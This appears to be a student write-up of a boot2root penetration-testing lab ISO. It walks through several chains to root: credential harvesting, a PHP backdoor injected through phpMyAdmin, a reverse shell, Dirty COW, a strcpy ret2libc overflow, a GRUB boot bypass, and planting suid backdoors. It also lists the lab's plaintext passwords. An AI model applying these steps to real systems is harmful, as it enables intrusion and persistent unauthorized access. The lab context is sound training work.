Résumé: Ce projet est une introduction à la pénetration d’un système.
Après tout vos efforts vous allez enfin pouvoir vous amuser ! Ce projet est donc une base pour vous faire comprendre comment vous devez procéder pour pénétrer un systéme sur lequel vous avez les droits légalement parlant. Je vous invite fortement à utiliser toutes les méthodes disponibles pour casser cet iso vraiment. La correction sera limité mais votre capacité à pouvoir exploiter votre iso sera grandement récompensée pour vous surtout au delà de votre note.
We have to find 2 exploit methods to validate the mandatory part. 1 bonus per other valid methods
- Find the server ip, scan local network -> nmap
- 192.168.1.22
- Port scan on the server -> nmap
- http
- https
- ftp
- ssh
- List https domains -> dirb
- Forum login -> credentials found on a forum post
lmezard
q\]Ej?*5K5cy*AJ
- Webmail login -> mail found on the forum user space
laurie@borntosec.net
q\]Ej?*5K5cy*AJ
- PhpMyAdmin login -> credentials found on a mail
root
Fg-'kKXBj87E:aJ$
- Inject php backdoor page in the forum to execute commands -> PhpMyAdmin SQL request
https://192.168.1.22/forum/templates_c/backdoor.php
- Inject python reverse shell -> backdoor guest + netcat host
- shell on server with user
www-data
- shell on server with user
- List kernel version + list popular vulnerabilities
- Dirty COW (CVE-2016-5195)
- Upload custom Dirty COW exploit + compile + run
root
user with the new passwordeasywin
From 8 to 10 are automated with the script dirtycow.py
ROOT! 🏁
Starting at the 1st solution point 8
- Inject python reverse shell -> backdoor guest + netcat host (or scripts
reverse_shell.py
)- shell on server with user
www-data
- shell on server with user
- FTP login -> credentials found on
/home/LOOKATME
lmezard
G!@M6f4Eatau{sF"
- files
README
andfun
- Extract
fun
tar archive ->tar xvf
- many pcap files in the directory
ft_fun
- many pcap files in the directory
- ADD all pcap files in good order in a c file and compile it ->
pcap_files_to_c.py
+ gcc- a program print a password
- SSH connection -> user in README and SHA256 of the password
laurie
330b845f32185747e4f8ca15d40ca59796035c89ea809fb5d30f4da83ecf45a4
- Inspect lauries's home
- files
README
andbomb
- files
- Reverse the binary
bomb
on laurie's home -> gdb or Ghidra- all files and exploit scripts in
laurie
directory - a password
- all files and exploit scripts in
- User login
thor
-> user in README and found password (warning subject error)thor
Publicspeakingisveryeasy.126241207201b2149opekmq426135
- Inspect thor's home
- files
README
andturtle
- files
- Reproduce the turtle instructions with a python script ->
thor/turtle.py
- word :
SLASH
- word :
- User login
zaz
-> user in README and md5 of the found wordzaz
646da671ca01bb5d84dbb5fb2238dc8e
- Inspect zaz's home
- binary file
exploit_me
with root suid
- binary file
- Exploit binary
strcpy
overflow -> gdb + ret2libc method ->zaz/exploit.py
- root shell
- (Optional) Add a backdoor binary to easily open a
root
shell on azaz
ssh session
From 21 to 22 are automated with the script zaz/exploit.py
ROOT! 🏁
- At the boot, spam
Shift
to access to the grub boot menu - List boot partitions with
Tab
live
- Enter
live init=/bin/bash
- root shell
- List the iso files -> script
ls_iso.py
- file
filesystem.squashfs
contain the filesystem
- file
- Extract the file
/root/.bash_history
from the filesystem ->extract_file_iso.py
- root
.bash_history
- root
- Get the zaz password ->
read_bash_history.py
646da671ca01bb5d84dbb5fb2238dc8e
- zaz ssh
Continue at the 2nd solution point 20
Starting at the 1st solution point 7
- Inject php exec code page in the forum to execute commands -> PhpMyAdmin SQL request
https://192.168.1.22/forum/templates_c/backdoor.php
- a new page
paths.php
- Naviguate in the directory
/home/LOOKATME/password
-> paths.php- FTP credentials
lmezard
G!@M6f4Eatau{sF"
Continue at the 2nd solution point 9
Using another DirtyCow exploit: c0w.c
Starting at the 1st solution point 10
- Upload custom Dirty COW exploit + compile + run ->
c0w.py
/usr/bin/passwd
is now a backdoor to spawn a root shell
All steps are automated with the script c0w.py
Starting at the 1st solution point 10
- Upload custom Dirty COW exploit + compile + run
root
user with new passwordeasywin
- Upload the custom php page
p0wny-shell.php
- php page
shell.php
on the forum with a shell
- php page
- Create a binary
exec_cmd
in the path with root suid to execute commandsexec_cmd
backdoor binary
- Go to
/forum/templates_c/shell.php
- backdoor page with root shell
All steps are automated with the script dirtycow_p0wny.py
Starting at the 2nd solution point 20
- Exploit binary
strcpy
overflow -> gdb + shellcode method ->- root shell
- (Optional) Add a backdoor binary to easily open a
root
shell on azaz
ssh session
https://github.com/diego-treitos/linux-smart-enumeration https://github.com/jondonas/linux-exploit-suggester-2 https://github.com/rebootuser/LinEnum
https://book.hacktricks.xyz/linux-unix/privilege-escalation https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS